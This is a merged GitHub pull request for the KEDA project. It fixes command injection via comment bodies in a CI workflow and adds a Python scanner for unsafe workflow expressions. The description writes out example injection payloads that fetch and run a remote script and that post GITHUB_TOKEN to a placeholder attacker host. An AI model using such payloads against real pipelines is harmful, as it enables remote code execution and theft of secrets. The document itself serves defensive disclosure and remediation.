
Security Update pr-e2e.yml #4822

Merged
merged 1 commit into from Jul 26, 2023

Conversation

aashish-19
Contributor

@aashish-19 aashish-19 commented Jul 26, 2023

pr-e2e.yml is vulnerable to RCE via command injection in the comment body. Currently, the following block simply appends the comment body to the shell command. Since the comment body is under the user's control, a malicious entity could create a comment such that it escapes the command meant to be executed and instead executes arbitrary commands, which could lead to a variety of security issues such as deletion of files and issues, exfiltration of environment variables to leak secrets, supply chain attacks, etc.:

      - name: Run end to end tests
        continue-on-error: true
        id: test
        env:
          AWS_RUN_IDENTITY_TESTS: true
          AZURE_RUN_AAD_POD_IDENTITY_TESTS: true
          AZURE_RUN_WORKLOAD_IDENTITY_TESTS: true
          GCP_RUN_IDENTITY_TESTS: true
          E2E_IMAGE_TAG: ${{ needs.triage.outputs.image_tag }}
          TEST_CLUSTER_NAME: keda-e2e-cluster-pr
        run: |
          MESSAGE="${{ github.event.comment.body }}"

A simple example of a malicious payload in the comment body can be:
Security"; curl https://malicious-site.com/malicious-script.sh | bash #
This would simply close the double quotes, and it would curl a malicious script and pipe it to bash for execution. It would comment out the rest of the command.

Similarly, to exfiltrate environment variables, a sample payload in the comment body can be:
Security"; $GITHUB_TOKEN > /tmp/env.txt && curl -X POST -d @/tmp/env.txt https://malicious-site.com/
This would first save the contents of the GITHUB_TOKEN environment variable in a file in the /tmp directory and then, using curl, send the contents of the file in a POST request to the attacker-controlled web server.

Fixes GHSA-w92x-gx4w-j5f2
RCE via command injection in pr-e2e.yml

References
For more information about this vulnerability, please refer to the following resources:
Exploiting GitHub Actions on Open Source Projects
Vulnerabilities in CI/CD Pipelines of Popular Open-Source Projects
Vulnerable GitHub Actions Workflows

Signed-off-by: Aashish Malhotra <74505547+aashish-19@users.noreply.github.com>
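The root cause described above is that `${{ ... }}` expressions are substituted into the `run:` script text before the shell ever parses it, so a quote inside the event data terminates the quoted string; the same expression placed under `env:` and read as `"$MESSAGE"` is inert. The scanner below is an added example (not part of this PR or the KEDA repository) that flags untrusted event expressions expanded inside `run:` blocks; `find_run_injections` is a hypothetical helper, the untrusted-field list follows GitHub's published script-injection guidance, and both sample fragments are constructed from the block quoted above (vulnerable) and its `env:`-based rewrite (hardened).

```python
import re

# Event fields GitHub's hardening guidance lists as attacker-controlled:
# comment/issue/PR titles and bodies, branch names, commit messages.
UNTRUSTED = re.compile(
    r"\bgithub\.(?:head_ref|event\.(?:comment\.body|issue\.(?:title|body)"
    r"|pull_request\.(?:title|body|head\.(?:ref|label))|review(?:_comment)?\.body"
    r"|head_commit\.message|commits\b.*?\.message))"
)
EXPR = re.compile(r"\$\{\{(.*?)\}\}")

def find_run_injections(workflow_text):
    """Return [(line_no, expression)] for untrusted ${{ }} expressions inside run: scripts.

    Only text that becomes the shell script is checked; the same expression assigned
    under env: is passed as an environment variable and is not flagged.
    """
    findings = []
    in_run, run_col = False, 0
    for line_no, line in enumerate(workflow_text.splitlines(), 1):
        if not line.strip():
            continue
        col = len(line) - len(line.lstrip())
        if in_run and col <= run_col:
            in_run = False                       # dedent: the block scalar has ended
        key = re.match(r"(?:-\s+)?run:\s*(.*)", line.lstrip())
        if key:
            in_run, run_col = True, line.find("run:")
            script = key.group(1)                # inline `run: cmd` form
        elif in_run:
            script = line
        else:
            continue
        for m in EXPR.finditer(script):
            if UNTRUSTED.search(m.group(1)):
                findings.append((line_no, m.group(1).strip()))
    return findings

# Constructed sample: the quoted step, interpolating the comment body into the script.
VULNERABLE = """\
      - name: Run end to end tests
        env:
          TEST_CLUSTER_NAME: keda-e2e-cluster-pr
        run: |
          MESSAGE="${{ github.event.comment.body }}"
"""
# Constructed sample: same step with the body passed through env: and quoted in the shell.
HARDENED = VULNERABLE.replace('          MESSAGE="${{ github.event.comment.body }}"\n', '          echo "$MESSAGE"\n') \
                     .replace("        run: |\n", "          MESSAGE: ${{ github.event.comment.body }}\n        run: |\n")
```

Running `find_run_injections(VULNERABLE)` reports line 5 with `github.event.comment.body`, while the hardened fragment yields no findings.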
@aashish-19 aashish-19 requested a review from a team as a code owner July 26, 2023 02:46
@github-actions

Thank you for your contribution! 🙏 We will review your PR as soon as possible.

🏖️ Over the summer, the response time will be longer than usual due to maintainers taking time off so please bear with us.

While you are waiting, make sure to:

Learn more about:

Member

@JorTurFer JorTurFer left a comment


❤️ ❤️ ❤️ ❤️

This has been in my TODO list for a while :(
Luckily, that code can't be executed by arbitrary users because previous steps require that the user is part of a specific org team, but fixing the issue is always better than restricting the attack vector.

@JorTurFer JorTurFer enabled auto-merge (squash) July 26, 2023 07:30
@JorTurFer
Member

/skip-e2e

@JorTurFer JorTurFer merged commit 89fb01a into kedacore:main Jul 26, 2023
21 checks passed
yoongon pushed a commit to yoongon/keda that referenced this pull request Aug 26, 2023
Signed-off-by: Yoon Park <yoongon.park@gmail.com>